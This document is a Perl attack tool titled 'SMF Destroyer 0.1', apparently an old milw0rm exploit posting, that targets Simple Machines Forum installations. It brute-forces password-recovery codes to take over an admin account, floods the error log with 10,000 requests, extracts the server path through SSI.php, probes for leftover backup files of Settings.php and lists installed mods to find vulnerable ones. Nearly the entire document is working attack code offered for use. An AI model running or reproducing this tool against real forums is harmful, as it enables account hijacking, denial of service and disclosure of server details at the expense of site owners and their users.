Simple Machines Forum - Destroyer 0.1#!/usr/bin/perl

    use LWP::UserAgent;
    use Getopt::Std;
    use LWP::Simple;
    use HTTP::Request;

#Author: Xianur0
#Uxmal666[at]gmail.com
# Cracks links Password Recovery
# Find Temporary Files executed by mods
# DB function Flood by Error Log
# File Path Disclosure
# List installed Mods (Useful To Find Mods Vulnerable)
# etc. ..

print `\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n`;
my $url = $ARGV[1] || die (`Use: smf.pl [option] [Full URL]
[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l
Installed Mods List \n-b Find Temporary\n-c  Cracks links Password
Recovery (Recommended Use Proxy)`);
version();
my $proxy = $ARGV[2] || ``;
if($ARGV[0] ne `-c` && $proxy ne ``) {
$ua->proxy([`http`], `http://`.$proxy);
}

    getopts('fplbc', \%opt);
    crackeador() if $opt{c};
    flood() if $opt{f};
    path() if $opt{p};
    list() if $opt{l};
    temp() if $opt{b};

sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}

sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12)
Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
if ($html =~ /title=`Simple Machines Forum` target=`_blank`>Powered by
SMF (.*?)<\/a>/){
$version = $1;
print `\n[X] SMF Version: $version\n`;
if($version < `1.1.7`) {
print `\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X]
http://milw0rm.com/search.php?dong=smf`.$version.`\n\n`;
}
}}}

sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print `[X] Directory: $1\n`;
} else { print `[!] Getting error Directory!\n`;}
}
}

sub flood {
print `[X] Starting Flood! (Press Ctrl + C To Finish)\n`;
$texto = `Flood!!!!!` x 15;
$req = HTTP::Request->new(GET =>
$url.'/index.php?action=help;page['.$texto.']=loginout');
&amp;headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print `[-] Sent: `.$i.`\n`;
} else {
print `[!] HTTP Error Query: ` . $res->status_line . `\n`;
}
}
}


sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url.`/`.$temp);
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
print `[X] Temporary File Found: `.$url.`/`.$temp.`\n`;
} else {print `[!] Not Found: `.$url.`/`.$temp.`\n`;}
}
}

sub list {
$req = HTTP::Request->new(GET => $url.`/Packages/installed.list`);
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
my @htmls = split(`\n`, $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print `[X]Package:\nDescription: $mod[0]\nFile:
$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n`;

}
}
}

sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die(`Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]\nExample: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128\n`);
my $reminder = $url.`?action=reminder`;
my $smf = $reminder.`;sa=setpassword;u=`.$id.`;code=`;
my $proxy = $ARGV[3];
if($proxy ne ``) {
$ua->proxy([`http`], `http://`.$proxy);
}

sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
        print `\n[+] SESSION Detected: $1\n`;
$session = $1;
} else { die `[!] SESSION could not be found!\n`;}
if ($contenedor =~ /<input type=`hidden` name=`sc` value=`(.*?)`/){
        print `\n[+] sc Detected: $1\n`;
    $sc = $1;
} else { die `[!] SC could not be found!\n`;}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
  $req->content_type('application/x-www-form-urlencoded');
  $req->content('user='.$nick.'&amp;sc='.$sc.'&amp;=enviar');
  $req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print `[x]Sent!\n`;

}

sub generador() {
my $password = ``;
my @chars = split(` `,
    `0 1 2 3 4 5 6 7 8 9 a b c d e
    f g h i j k l m n o p q r s t
    u v w x y z`);
for (my $i=0; $i < 10 ;$i++) {
    $_rand = int(rand 35);
    $password .= $chars[$_rand];
}
return $password;
}

sub brute() {
while($bucle ne `finito`) {
$code = generador();
    my $fuente = $reminder.`;sa=setpassword;u=`.$id.`;code=`.$code;
    my $content = HTTP::Request->new(GET => $reminder);
    my $content = $ua->request($content)->as_string;
if ($content =~ /<input type=`hidden` name=`sc` value=`(.*?)`/){
    $sc = $1;
} else { die `[!] SC could not be found!\n`;}
if ($content =~ /Set-Cookie: (.*?)
/){
        print `\n[+] New SESSION Detected: $1\n`;
$session = $1;
} else { die `[!] SESSION could not be found!\n`;}
print `[+] Testing Code: `.$code.`\n`;
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
  $req->content_type('application/x-www-form-urlencoded');
  $req->content('passwrd1=xianur0washere&amp;passwrd2=xianur0washere&amp;code='.$code.'&amp;u='.$id.'&amp;sc='.$sc);
  $req->header('Cookie' => $session);
  $res = $ua->request($req);
  if ($res->is_success) {
     if($res->content =~ '<input type=`text` name=`user` size=`20` value=`') {
print `[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n`;
exit;
}
} else { die `[!] HTTP response incorrect!\n`;}}}

print `\n[-] Sending Mail...\n\n`;
mail();
print `\n[-] Attacking code link recovery...\n`;
brute();
}

# milw0rm.com [2009-01-12]